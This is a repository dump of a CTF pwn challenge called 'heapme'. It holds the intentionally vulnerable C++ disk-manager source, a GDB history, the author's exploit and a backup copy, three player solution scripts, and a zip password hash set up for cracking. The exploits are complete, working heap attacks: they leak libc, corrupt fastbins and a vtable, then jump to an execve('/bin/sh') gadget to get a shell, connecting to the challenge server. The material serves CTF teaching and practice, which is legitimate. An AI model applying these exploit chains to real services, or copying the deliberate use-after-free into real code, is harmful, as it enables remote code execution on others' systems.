| x/a 0x55b024d262d0 8 | disassemble main 9 | disassemble main 10 | disassemble 0x55b02440c824 11 | disassemble _ZN11DiskFactory8readDiskEv 12 | b * 13 | b *_ZN11DiskFactory8readDiskEv+144 14 | c 15 | r 16 | c 17 | telescope 0x55555556b690 18 | telescope 0x55555556b680 19 | kill 20 | attach 30751 21 | x/a 055ebe76ed3d0 22 | x/a 0x55ebe76ed3d0 23 | telescope 0x55ebe76ed3d0 24 | telescope 0x55ebe76ed470 25 | telescope 0x55ebe76ed300 26 | kill 27 | attach 35689 28 | telescope 0x55aead067130 29 | telescope 55aead067120 30 | telescope 0x55aead067120 31 | x/a0x55aead067130 32 | x/a0x55aeab96bda8 33 | x/a0x55aeab9692fc 34 | 0x55aeab9692fc0x55aeab9692fc 35 | kill 36 | pgrep 37 | sh pgrep heap 38 | attach 35689 39 | attach 35689 40 | attach 35965 41 | kill 42 | attach 35990 43 | kill 44 | attach 36005 45 | x/a 0x5634da756038 46 | telescope 0x5634da756038 47 | telescope 0x5634da756080 48 | c 49 | bt 50 | disassemble 0x00005634d942857a 51 | x/a 0x5634da756038 52 | x/a 0x5634da756080 53 | x/a 0x5634da756180 54 | x/a 0x5634da756080 + 0x100 55 | x/a 0x5634da756038 - 0x5634da756080 56 | x/a 0x5634da756080 - 0x5634da756038 57 | x/a 0x5634da756080 + 0x48 58 | exit 59 | kill 60 | attach 36073 61 | c 62 | kill 63 | attach 36208 64 | c 65 | x/a $rdx 66 | x/a 0x55576061d0c8 67 | kill 68 | attach 36269 69 | c 70 | x/a $rax 71 | kil 72 | kill 73 | attach 36540 74 | x/a 0x55a59c1fd060 75 | x/10a 0x55a59c1fd060 76 | kill 77 | attach 36671 78 | x/a 0x7f657d7b7b98 79 | c 80 | x/a $rdx 81 | x/a 0x561c855830c8 82 | x/s $rdi 83 | x/a $rdi 84 | p &system 85 | info proc mappings 86 | # 0x7f657d7b7b98 87 | p/a 0x7f657d7b7b98 - 0x7f657d3f3000 88 | x/a 0x7f657d7b7b98 89 | p/a $rax 90 | x/a $rsp+0x50 91 | x/a $rsp+0x30 92 | 0x561ef5869080 - 0x561ef5869780 93 | p/a 0x561ef5869080 - 0x561ef5869780 94 | p/a 0x561ef5869780 - 0x561ef5869080 95 | p/a 0x556953bbb080 + 0x700 96 | p/a 0x555d16468240 - 555d16468080 97 | p/a 0x555d16468240 - 0x555d16468080 98 | kill 99 | attach 37155 100 | c 101 | x/i $pc 102 | 
b execve 103 | kill 104 | attach 37163 105 | c 106 | kill 107 | attach 37181 108 | c 109 | x/a $rdi 110 | x/s $rdi 111 | x/a $rsi 112 | x/2 $rsi 113 | x/s 0x565266ee9887 114 | x/a $rdx 115 | x/3a $rdx 116 | c 117 | bt 118 | kill 119 | attach 37289 120 | c 121 | d 122 | c 123 | attach 37314 124 | set follow-exec-mode new 125 | set follow-fork-mode child 126 | c 127 | c 128 | kill 129 | attach 37323 130 | c 131 | x/a $rax 132 | c 133 | c 134 | c 135 | kill 136 | attach 37341 137 | c 138 | kill 139 | attach 37375 140 | c 141 | x/a $rax 142 | x/a $rsp+0x30 143 | x/a $rsp+0x50 144 | x/a $rsp+0x70 145 | x/a $rsp+0x30 146 | x/a $rsp+0x70 147 | x/a $rsp+0x70 148 | x/a $rsp+0x70 149 | x/a $rsp+0x70 150 | x/a $rsp+0x70 151 | x/a $rsp+0x30 152 | x/a $rsp+0x50 153 | x/10a $rsp+0x50 154 | x/s 0x563c54e1b226 155 | p/a $rax 156 | 0x563c54e1b226 157 | x/100a $rsp+0x30 158 | x/100a $rsp 159 | f 160 | kill 161 | attach 37486 162 | c 163 | bt 164 | x/i 0x000055c5d456f57a 165 | disassemble 0x000055c5d456f57a 166 | x/10i 0x000055c5d456f57a 167 | x/10i 0x000055c5d456f57a - 1 168 | x/10i 0x000055c5d456f57a - 2 169 | x/a $rsp 170 | x/a $rsp+0x30 171 | x/a $rsp+0x50 172 | x/a $rsp+0x70 173 | x/100a $rsp 174 | kill 175 | attach 37542 176 | c 177 | x/a $rsp 178 | x/a $rsp+0x30 179 | x/a $rsp+0x50 180 | x/a $rsp+0x70 181 | x/100a $rsp 182 | x/10a $rsp+0x30 183 | x/100a $rsp+0x30 184 | x/100a $rsp+0x50 185 | kill 186 | attach 37658 187 | c 188 | x/a $rsp 189 | x/a $rsp+0x30 190 | x/a $rsp+0x50 191 | x/a $rsp+0x70 192 | kill 193 | attach 37756 194 | c 195 | kill 196 | attach 37773 197 | c 198 | x/a $rsp 199 | x/a $rsp+0x30 200 | x/a $rsp+0x40 201 | x/a $rsp+0x70 202 | x/a $rsp+0x70 203 | x/a $rsp+0x70 204 | x/a $rsp+0x70 205 | x/a $rsp+0x70 206 | b execve 207 | c 208 | c 209 | d 210 | b execve 211 | c 212 | d 213 | b execve 214 | attach 37790 215 | b execve 216 | c 217 | x/a $rsi 218 | x/a $rdi 219 | x/s $rdi 220 | x/s $rsi 221 | x/a $rsi 222 | x/a $rdx 223 | x/10a $rdx 224 | x/s 0x7fffd0aebfc1 
225 | exit 226 | quit 227 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | # g++ heapme.cpp -o heapme -fstack-protector-all -Wl,-z,relro,-z,now 3 | # g++ heapme.cpp -o heapme # -fstack-protector-all -Wl,-z,relro,-z,now 4 | # g++ heapme.cpp -o heapme -fno-pie -fno-pic # -fstack-protector-all -Wl,-z,relro,-z,now 5 | g++ heapme.cpp -o heapme -fstack-protector -g # -Wl,-z,relro,-z,now 6 | cp heapme ../chall/ 7 | 8 | patch: 9 | patchelf --set-interpreter /root/tools/glibc/x64/ld-2.23.so ./heapme 10 | 11 | clean: 12 | rm -rf heapme 13 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import pwn 4 | import clize 5 | 6 | # Double free is way easier but wanted to give a try to the vtable 7 | # https://twitter.com/chaignc/status/958854296833060864?s=20 <= read this 8 | # Warning this is how a one hour written exploit looks like, #shame 9 | 10 | # gdb-peda$ telescope 0x55555556b690 11 | # 0000| 0x55555556b690 --> 0x555555557da8 --> 0x5555555552fc (<_ZN4Disk4readEv>: push rbp) 12 | # 0008| 0x55555556b698 --> 0x55555556b6b0 ("testtest") 13 | # 0016| 0x55555556b6a0 --> 0x0 14 | # 0024| 0x55555556b6a8 --> 0x31 ('1') 15 | # 0032| 0x55555556b6b0 ("testtest") 16 | 17 | def exploit(*, remote=True, host="127.0.0.1", port=4242): 18 | print("Please: socat TCP-LISTEN:8080 openssl-connect:SERVER_HERE:4242,cert=client.pem,cafile=server.crt,verify=0") 19 | # socat -d TCP-LISTEN:1234,reuseaddr,fork openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0 20 | if remote: 21 | p = pwn.remote(host, port) 22 | else: 23 | p = pwn.process("./heapme", 
env={"LD_PRELOAD":"/root/veille/challenge/ctf/FIC_Hexpresso_2019_quals/pwn/secret_ressources/libc-2.23.so"}) 24 | # p.interactive() 25 | 26 | 27 | # 0xf1147 execve("/bin/sh", rsp+0x70, environ) 28 | # constraints: 29 | # [rsp+0x70] == NULL 30 | one_gadget_rce = 0xf1147 31 | 32 | print("[+] Fill memory") 33 | for i in range(70, 80): 34 | create_disk(p, i, 32) 35 | print("B") 36 | write_disk(p, i, b"A" * 32) 37 | 38 | create_disk(p, 42, 16) 39 | 40 | print("[+] Fill freelist") 41 | for i in range(70, 80): 42 | delete_disk(p, i) 43 | 44 | print("#" * 100) 45 | for i in range(80, 100): 46 | create_disk(p, i, 16) 47 | 48 | print("Leak " + "#" * 100) 49 | print("=> 3 leak buffer of [5]") 50 | _, heap_leak = read_disk(p, 73) 51 | one_gadget_ptr_offset = heap_leak + 0x700 52 | 53 | print("Leak main_arena ".ljust(100, "#")) 54 | create_disk(p, 50, 0x400) 55 | create_disk(p, 51, 16) 56 | delete_disk(p, 50) 57 | 58 | create_disk(p, 50, 16) 59 | _, main_arena = read_disk(p, 50) 60 | print(f"main_arena = {main_arena:x}") 61 | libc_base = main_arena - 0x3c4b98 62 | print(f"libc_base = {libc_base:x}") 63 | one_gadget_rce += libc_base 64 | print(f"one_gadget_rce = {one_gadget_rce:x}") 65 | 66 | print("Upload one_gadget_rce ".ljust(100, "#")) 67 | create_disk(p, 50, 100) 68 | write_disk(p, 50, pwn.p64(one_gadget_rce)[:6]) 69 | read_disk(p, 50) 70 | 71 | print("Overwrite ".ljust(100, "#")) 72 | print("=> 12 => overwrite [4] Disk") 73 | write_disk(p, 82, pwn.p64(one_gadget_ptr_offset)) 74 | 75 | p.sendline("1") 76 | p.sendline("74") 77 | 78 | p.interactive() 79 | 80 | ###################################################################### 81 | ### Utils ### 82 | ###################################################################### 83 | 84 | def create_disk(p, index, size): 85 | pwn.log.info("create_disk") 86 | p.sendlineafter('Command: ', '0') 87 | p.sendlineafter('Size: ', str(size)) 88 | p.sendlineafter('Index: ', str(index)) 89 | 90 | def read_disk(p, index): 91 | 
pwn.log.info("read_disk") 92 | p.sendlineafter('Command: ', '1') 93 | p.sendlineafter('Index: ', str(index)) 94 | p.recvuntil("Data: ") 95 | data = p.recvuntil(b"\n#########################################################", drop=True) 96 | print(f"Read Data: {data}") 97 | ptr = data.split(b'\n')[0].ljust(8, b'\x00') 98 | ptr = pwn.u64(ptr) 99 | print(f"ptr = {ptr:x}") 100 | return data, ptr 101 | 102 | def write_disk(p, index, data): 103 | pwn.log.info("write_disk") 104 | p.sendlineafter('Command: ', '2') 105 | p.sendlineafter('Index: ', str(index)) 106 | p.sendlineafter('Data: ', data) 107 | 108 | def delete_disk(p, index): 109 | pwn.log.info("delete_disk") 110 | p.sendlineafter('Command: ', '3') 111 | p.sendlineafter('Index: ', str(index)) 112 | 113 | def exit(p): 114 | p.sendlineafter('Command: ', '4') 115 | 116 | if __name__ == "__main__": 117 | clize.run(exploit) 118 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/exploit.py.sos: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import pwn 4 | import clize 5 | 6 | # gdb-peda$ telescope 0x55555556b690 7 | # 0000| 0x55555556b690 --> 0x555555557da8 --> 0x5555555552fc (<_ZN4Disk4readEv>: push rbp) 8 | # 0008| 0x55555556b698 --> 0x55555556b6b0 ("testtest") 9 | # 0016| 0x55555556b6a0 --> 0x0 10 | # 0024| 0x55555556b6a8 --> 0x31 ('1') 11 | # 0032| 0x55555556b6b0 ("testtest") 12 | 13 | def exploit(*, remote=True, host="127.0.0.1", port=4242): 14 | if remote: 15 | p = pwn.remote(host, port) 16 | else: 17 | p = pwn.process("./heapme", env={"LD_PRELOAD":"/root/tools/glibc/x64/libc-2.23.so"}) 18 | 19 | 20 | # 0xf1147 execve("/bin/sh", rsp+0x70, environ) 21 | # constraints: 22 | # [rsp+0x70] == NULL 23 | one_gadget_rce = 0xf1147 24 | 25 | print("[+] Fill memory") 26 | for i in range(70, 80): 27 | create_disk(p, i, 32) 28 | print("B") 29 | write_disk(p, i, b"A" * 32) 30 | 31 | 
create_disk(p, 42, 16) 32 | 33 | print("[+] Fill freelist") 34 | for i in range(70, 80): 35 | delete_disk(p, i) 36 | 37 | print("#" * 100) 38 | for i in range(80, 100): 39 | create_disk(p, i, 16) 40 | 41 | print("Leak " + "#" * 100) 42 | print("=> 3 leak buffer of [5]") 43 | _, heap_leak = read_disk(p, 73) 44 | one_gadget_ptr_offset = heap_leak + 0x700 45 | 46 | print("Leak main_arena ".ljust(100, "#")) 47 | create_disk(p, 50, 0x400) 48 | create_disk(p, 51, 16) 49 | delete_disk(p, 50) 50 | 51 | create_disk(p, 50, 16) 52 | _, main_arena = read_disk(p, 50) 53 | print(f"main_arena = {main_arena:x}") 54 | libc_base = main_arena - 0x3c4b98 55 | print(f"libc_base = {libc_base:x}") 56 | one_gadget_rce += libc_base 57 | print(f"one_gadget_rce = {one_gadget_rce:x}") 58 | 59 | print("Upload one_gadget_rce ".ljust(100, "#")) 60 | create_disk(p, 50, 100) 61 | write_disk(p, 50, pwn.p64(one_gadget_rce)[:6]) 62 | read_disk(p, 50) 63 | 64 | print("Overwrite ".ljust(100, "#")) 65 | print("=> 12 => overwrite [4] Disk") 66 | write_disk(p, 82, pwn.p64(one_gadget_ptr_offset)) 67 | raw_input("GDB") 68 | 69 | p.sendline("1") 70 | p.sendline("74") 71 | 72 | p.interactive() 73 | 74 | ###################################################################### 75 | ### Utils ### 76 | ###################################################################### 77 | 78 | def create_disk(p, index, size): 79 | pwn.log.info("create_disk") 80 | p.sendlineafter('Command: ', '0') 81 | p.sendlineafter('Size: ', str(size)) 82 | p.sendlineafter('Index: ', str(index)) 83 | 84 | def read_disk(p, index): 85 | pwn.log.info("read_disk") 86 | p.sendlineafter('Command: ', '1') 87 | p.sendlineafter('Index: ', str(index)) 88 | p.recvuntil("Data: ") 89 | data = p.recvuntil(b"\n#########################################################", drop=True) 90 | print(f"Read Data: {data}") 91 | ptr = data.split(b'\n')[0].ljust(8, b'\x00') 92 | ptr = pwn.u64(ptr) 93 | print(f"ptr = {ptr:x}") 94 | return data, ptr 95 | 96 | def 
write_disk(p, index, data): 97 | pwn.log.info("write_disk") 98 | p.sendlineafter('Command: ', '2') 99 | p.sendlineafter('Index: ', str(index)) 100 | p.sendlineafter('Data: ', data) 101 | 102 | def delete_disk(p, index): 103 | pwn.log.info("delete_disk") 104 | p.sendlineafter('Command: ', '3') 105 | p.sendlineafter('Index: ', str(index)) 106 | 107 | def exit(p): 108 | p.sendlineafter('Command: ', '4') 109 | 110 | if __name__ == "__main__": 111 | clize.run(exploit) 112 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/heapme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/secret_ressources/heapme -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/heapme.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | class Disk 7 | { 8 | public: 9 | char *buffer; 10 | 11 | public: 12 | Disk(size_t size) { 13 | buffer = new char[size]; 14 | } 15 | ~Disk() { 16 | delete buffer; 17 | } 18 | virtual void read() { 19 | std::cout << "Data: " << buffer << std::endl; 20 | // std::cout << "Ptr: " << this << " : " << (void*) buffer << std::endl; 21 | } 22 | virtual void write() { 23 | std::cout << "Data: "; 24 | std::cin >> buffer; 25 | } 26 | }; 27 | 28 | class DiskFactory 29 | { 30 | private: 31 | Disk *disks[100] = {0}; 32 | 33 | size_t getIndex() { 34 | size_t index = 0; 35 | 36 | do { 37 | std::cout << "Index: "; 38 | std::cin >> index; 39 | std::cout << index << std::endl; 40 | } while (index >= 100); 41 | return index; 42 | } 43 | 44 | public: 45 | void createDisk() { 46 | std::cout << "[+] Create Disk" << std::endl; 47 | std::cout << "Size: "; 48 | size_t size = 0; 49 | std::cin >> 
size; 50 | disks[getIndex()] = new Disk(size); 51 | } 52 | void readDisk() { 53 | std::cout << "[+] read Disk" << std::endl; 54 | Disk *disk = disks[getIndex()]; 55 | if (disk) 56 | disk->read(); 57 | else 58 | std::cout << "ERROR" << std::endl; 59 | } 60 | void writeDisk() { 61 | std::cout << "[+] write Disk" << std::endl; 62 | Disk *disk = disks[getIndex()]; 63 | if (disk) 64 | disk->write(); 65 | else 66 | std::cout << "ERROR" << std::endl; 67 | } 68 | void deleteDisk() { 69 | std::cout << "[+] delete Disk" << std::endl; 70 | Disk *disk = disks[getIndex()]; 71 | if (disk) 72 | delete disk; 73 | else 74 | std::cout << "ERROR" << std::endl; 75 | } 76 | }; 77 | 78 | class CommandManager 79 | { 80 | private: 81 | DiskFactory disk_factory; 82 | 83 | size_t getCommand() { 84 | size_t index = 0; 85 | std::cout << "Command: "; 86 | std::cin >> index; 87 | return index; 88 | } 89 | void menu() { 90 | std::cout << "#########################################################" << std::endl; 91 | std::cout << "0: Create disk" << std::endl; 92 | std::cout << "1: Read disk" << std::endl; 93 | std::cout << "2: Write disk" << std::endl; 94 | std::cout << "3: Delete disk" << std::endl; 95 | std::cout << "4: Exit" << std::endl; 96 | 97 | } 98 | public: 99 | void loop() { 100 | while (true) { 101 | menu(); 102 | switch (getCommand()) { 103 | case 0: 104 | disk_factory.createDisk(); break; 105 | case 1: 106 | disk_factory.readDisk(); break; 107 | case 2: 108 | disk_factory.writeDisk(); break; 109 | case 3: 110 | disk_factory.deleteDisk(); break; 111 | default: 112 | std::cout << "exit" << std::endl; 113 | exit(0); 114 | } 115 | } 116 | } 117 | }; 118 | 119 | int main() 120 | { 121 | // alarm(10); 122 | std::cout << "Welcome to the final stage of the CaptureTheFIC CTF by HexpressoTeam" << std::endl; 123 | std::cout << "Author: @chaignc" << std::endl; 124 | CommandManager command_manager; 125 | command_manager.loop(); 126 | return 0; 127 | } 128 | 
-------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/requirements.txt: -------------------------------------------------------------------------------- 1 | git+https://github.com/Gallopsled/pwntools.git@dev3 2 | clize 3 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/solutions/Shiro.md: -------------------------------------------------------------------------------- 1 | [Shiro](https://github.com/Pycatchown/writeUps/blob/master/FIC/step7/wu_step7.md) 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/solutions/geluchat.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | from pwn import * 5 | import time 6 | import os 7 | 8 | context(arch='amd64') 9 | p = 0 10 | libc = 0 11 | LOCAL = False 12 | DEBUG = False 13 | 14 | def wait(until): 15 | buf=p.recvuntil(until) 16 | if(DEBUG): 17 | print buf 18 | return buf 19 | 20 | def start(): 21 | global p,libc 22 | #p = process('./heapme',env={"LD_PRELOAD":"./libc-2.23.so"}) 23 | #p = process('LD_PRELOAD=./libc-2.23.so strace -o out -vf ./heapme',shell=True) 24 | p=process('socat stdio openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0',shell=True) 25 | libc = ELF('./libc-2.23.so') 26 | print wait("d: ") 27 | 28 | def create(idx,size): 29 | p.sendline("0") 30 | wait("ze: ") 31 | p.sendline(str(size)) 32 | wait("ex: ") 33 | p.sendline(str(idx)) 34 | wait("d: ") 35 | 36 | 37 | def read(idx): 38 | p.sendline("1") 39 | wait("ex: ") 40 | p.sendline(str(idx)) 41 | return wait("d: ") 42 | 43 | 44 | def write(idx,content): 45 | p.sendline("2") 46 | wait("ex: ") 47 | p.sendline(str(idx)) 48 | wait("ta: ") 49 | p.sendline(content) 50 | wait("d: ") 51 | 52 | def delete(idx): 53 | p.sendline("3") 54 | wait("ex: ") 55 
| p.sendline(str(idx)) 56 | wait("d: ") 57 | 58 | def close(): 59 | p.close() 60 | 61 | 62 | 63 | 64 | DEBUG=False 65 | start() 66 | create(0,0x10) 67 | create(1,0x10) 68 | create(2,0x80) 69 | delete(1) 70 | delete(2) 71 | create(3,0x10) 72 | 73 | a=read(3) 74 | leak=(u64((a.split(': ')[1].split('\n')[0]).ljust(8,'\x00'))) 75 | print hex(leak) 76 | magic=leak-3951528+0xf1147 77 | print(hex(magic)) 78 | 79 | 80 | create(4,0x10) 81 | create(5,0x20) 82 | delete(4) 83 | delete(5) 84 | create(6,0x10) 85 | a=read(6) 86 | leak=(u64((a.split(': ')[1].split('\n')[0]).ljust(8,'\x00'))) 87 | print hex(leak) 88 | magic_ph=leak-0x30 89 | 90 | create(7,0x10) 91 | create(8,0x10) 92 | create(9,0x10) 93 | 94 | write(8,"b"*32+p64(magic_ph)) 95 | print(hex(magic_ph)) 96 | 97 | #wtf ? 98 | write(0,"a"*36+'\x00'+'a'*0x3b+'-s\x00') 99 | write(6,p64(magic)) 100 | 101 | 102 | p.sendline("1") 103 | p.sendline(str(9)) 104 | 105 | p.interactive() 106 | 107 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/solutions/laxa.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | # https://www.synacktiv.com/posts/challenges/fic2020-prequals-ctf-write-up.html 6 | # socat TCP-LISTEN:8080,fork,reuseaddr openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0 7 | 8 | ### 9 | 10 | if len(sys.argv) > 1: 11 | DEBUG = False 12 | libc = ELF('libc-2.23.so') 13 | else: 14 | DEBUG = True 15 | libc = ELF('libc-2.23.so') 16 | 17 | b = ELF('heapme') 18 | context.log_level = 'info' 19 | context.arch = 'amd64' 20 | 21 | ### 22 | 23 | if DEBUG: 24 | r = process('./heapme', aslr=True, env={'LD_PRELOAD':'/home/laxa/Documents/Challenges/CTF/hexpresso2k19/libc-2.23.so'}) 25 | else: 26 | r = process('socat stdio openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0'.split()) 27 | 28 | GDB = False 29 | if DEBUG and GDB: 
30 | bps = [] 31 | base = 0x0000555555554000 32 | params = '' 33 | for bp in bps: 34 | params += 'b *{}\n'.format(hex(bp + base)) 35 | gdb.attach(r, params) 36 | 37 | def menu(): 38 | global r 39 | return r.recvuntil('4: Exit\n') 40 | 41 | def create_disk(size, index): 42 | global r 43 | r.sendline('0') 44 | r.sendlineafter('[+] Create Disk\n', str(size)) 45 | r.sendline(str(index)) 46 | return menu() 47 | 48 | def write_disk(index, data): 49 | global r 50 | r.sendline('2') 51 | r.sendlineafter('write Disk\n', str(index)) 52 | r.sendline(data) 53 | return menu() 54 | 55 | def read_disk(index): 56 | global r 57 | r.sendline('1') 58 | r.sendlineafter('read Disk\n', str(index)) 59 | r.recvuntil('Data: ') 60 | data = menu() 61 | return data.split('\n')[0] 62 | 63 | def delete_disk(index): 64 | global r 65 | r.sendline('3') 66 | r.sendlineafter('delete Disk\n', str(index)) 67 | return menu() 68 | 69 | menu() 70 | create_disk(256, 0) 71 | create_disk(256, 15) 72 | delete_disk(0) 73 | create_disk(256, 0) 74 | 75 | data = read_disk(0) 76 | leak = u64(data.ljust(8, '\x00')) 77 | 78 | libc_base = leak - 0x3c4b78 79 | log.info('leak: %#x' % leak) 80 | log.info('libcbase: %#x' % libc_base) 81 | 82 | # modified fastbin_dup_into_stack 83 | # Goal is to get an alloc into libc BSS 84 | create_disk(48, 2) 85 | create_disk(48, 3) 86 | delete_disk(2) 87 | delete_disk(3) 88 | 89 | # this offset points to a p64(0x40) value inside libc.bss where we are going 90 | # to allocate a fastbin of size 0x30 91 | offset = 0x98f 92 | 93 | # We perform a modified version of fastbin_dup_into_stack 94 | # we have two 0x30 chunks in the free_list, we overflow the one pointing to the first one 95 | # and replace the pointer to point to leak - offset - 0x8 which is will be considered 96 | # valid by malloc. 
We then do 2 allocations, the second one will point inside libc.bss 97 | # We can therefore craft a vtable there and overflow the heap as we please using our vtable 98 | p = 'A' * 256 + p64(0) + p64(0x21) + p64(0) * 2 + p64(0) + p64(0x41) + 'B' * 48 99 | p += p64(0) + p64(0x21) + p64(0) * 2 + p64(0) + p64(0x41) + p64(leak - offset - 0x8) 100 | write_disk(15, p) 101 | 102 | create_disk(48, 10) 103 | log.info('libc.bss: %#x' % (leak - offset - 0x8)) 104 | create_disk(48, 11) # points into libc.bss 105 | 106 | # This is the magic gadget we use 107 | # 0xf1147 execve("/bin/sh", rsp+0x70, environ) 108 | # constraints: 109 | # [rsp+0x70] == NULL 110 | # [rsp+0x70] contains the index [1] of the DiskFactory, therefore, we dont use this index 111 | # to satisfy the condition 112 | write_disk(11, p64(libc_base + 0xf1147)) # magic gadget 113 | 114 | # Overflowing the heap into disk index [15] with a vtable->read pointing to magic gadget 115 | vtable = leak - offset - 0x8 + 0x10 116 | p = 'A' * 256 + p64(0x110) + p64(0x21) + p64(vtable) 117 | write_disk(0, p) 118 | 119 | # Triggering the exploit 120 | r.sendline('1') 121 | r.sendline('15') 122 | r.recvuntil('read Disk\n') 123 | r.recvline() 124 | 125 | r.interactive() 126 | r.close() 127 | 128 | ''' 129 | https://ctf.hexpresso.fr/756875e19d16013c5072b2b6e17804f7 130 | 131 | YOU DID IT !!! 132 | Here is the LAST flag. 
133 | We hope you enjoyed it ;) 134 | Send us an email here : 5c141765db003a82e9a9978566b6d78f@hexpresso.fr 135 | ''' 136 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/solutions/uaf.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import telnetlib 3 | 4 | def read_until(s, text): 5 | buffer = b'' 6 | while len(buffer) < len(text): 7 | buffer += s.recv(1) 8 | while buffer[-len(text):] != text: 9 | buffer += s.recv(1) 10 | return buffer[:] 11 | 12 | def create_entry(s, size, idx): 13 | s.send('0\n'.encode()) 14 | p = read_until(s, 'Size: '.encode()) 15 | s.send((str(size) + "\n").encode()) 16 | p = read_until(s, 'Index: '.encode()) 17 | s.send((str(idx) + "\n").encode()) 18 | return recv_menu(s) 19 | 20 | def read_entry(s, idx): 21 | s.send('1\n'.encode()) 22 | p = read_until(s, 'Index: '.encode()) 23 | s.send((str(idx) + "\n").encode()) 24 | p = read_until(s, 'Data: '.encode()) 25 | p = read_until(s, '\n'.encode()) 26 | return recv_menu(s), p 27 | 28 | def write_entry(s, idx, data): 29 | s.send('2\n'.encode()) 30 | p = read_until(s, 'Index: '.encode()) 31 | s.send((str(idx) + "\n").encode()) 32 | p = read_until(s, 'Data: '.encode()) 33 | s.send(data + "\n".encode()) 34 | return recv_menu(s) 35 | 36 | def delete_entry(s, idx): 37 | s.send('3\n'.encode()) 38 | p = read_until(s, 'Index: '.encode()) 39 | s.send((str(idx) + "\n").encode()) 40 | return recv_menu(s) 41 | 42 | def recv_menu(s): 43 | res = read_until(s, 'Command: '.encode()) 44 | return res 45 | 46 | #context.log_level = "debug" 47 | 48 | s = socket.socket() 49 | s.connect(("localhost", 4141)) 50 | recv_menu(s) 51 | create_entry(s, 136, 20) 52 | create_entry(s, 16, 21) 53 | delete_entry(s, 20) 54 | create_entry(s, 136, 22) 55 | _, leak = read_entry(s, 22) 56 | leak = leak[:-1] 57 | 58 | leak = int.from_bytes(leak, byteorder='little') 59 | magic_gadget = leak - 2964017 60 | 61 | 
print('leak is: {:x}'.format(leak)) 62 | print('magic gadget is: {:x}'.format(magic_gadget)) 63 | 64 | 65 | create_entry(s, 16, 23) 66 | create_entry(s, 16, 24) 67 | delete_entry(s, 23) 68 | delete_entry(s, 24) 69 | create_entry(s, 16, 25) 70 | _, leak_heap = read_entry(s, 25) 71 | 72 | leak_heap = leak_heap[:-1] 73 | 74 | leak_heap = int.from_bytes(leak_heap, byteorder='little') 75 | print('leak_heap is: {:x}'.format(leak_heap)) 76 | 77 | create_entry(s, 16, 26) 78 | create_entry(s, 16, 27) 79 | read_entry(s, 26) 80 | read_entry(s, 27) 81 | write_entry(s, 26, 'A'.encode() * 128 + (magic_gadget).to_bytes(8, byteorder='little')) 82 | write_entry(s, 26, 'A'.encode() * 96 + (leak_heap + 176).to_bytes(8, byteorder='little')) 83 | 84 | s.send('1\n'.encode()) 85 | p = read_until(s, 'Index: '.encode()) 86 | s.send((str(27) + "\n").encode()) 87 | a = s.recv(100) 88 | 89 | print('a', a) 90 | t = telnetlib.Telnet() 91 | t.sock = s 92 | t.interact() 93 | 94 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/8e23eca76cbfdb90988a5b92577c147c.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/test_player/8e23eca76cbfdb90988a5b92577c147c.zip -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/client.pem: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/test_player/client.pem -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/doc.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/test_player/doc.txt -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/hash.txt: -------------------------------------------------------------------------------- 1 | 8e23eca76cbfdb90988a5b92577c147c.zip:$pkzip2$3*2*1*0*8*24*9312*7389*5cbd04e91d1fc533d53e65a651eba18ae32e3367e3ea4a10c775d3921153a6615035b56b*1*0*8*24*1001*af37*dc995002bd4806c7f16a9c417a150821bd77143897e6f154bb9552868dfe9242cf545315*2*0*90*a0*672aa752*0*41*8*90*672a*91d8*6e6743f31ebc68852fed35d9247fd7cc2b0c9925e825c428a908fecd0f779b349b6827c48b97bb8e10c614c9930445797204b4e26fae93e99a37b81c0f19acd934e1221f0a2ace7152a4c69192e1f1fac3d0750ecf825cf8f766aaf1d082ebc2a4095f21e8a11a89b7b0cc4e33209447c5bdd0a5c83e54c459e42edacb96f759cc40cfdf1eb4f2e04fc12a59dc3e8ef3*$/pkzip2$::8e23eca76cbfdb90988a5b92577c147c.zip:doc.txt, heapme, libc-2.23.so:8e23eca76cbfdb90988a5b92577c147c.zip 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/heapme: 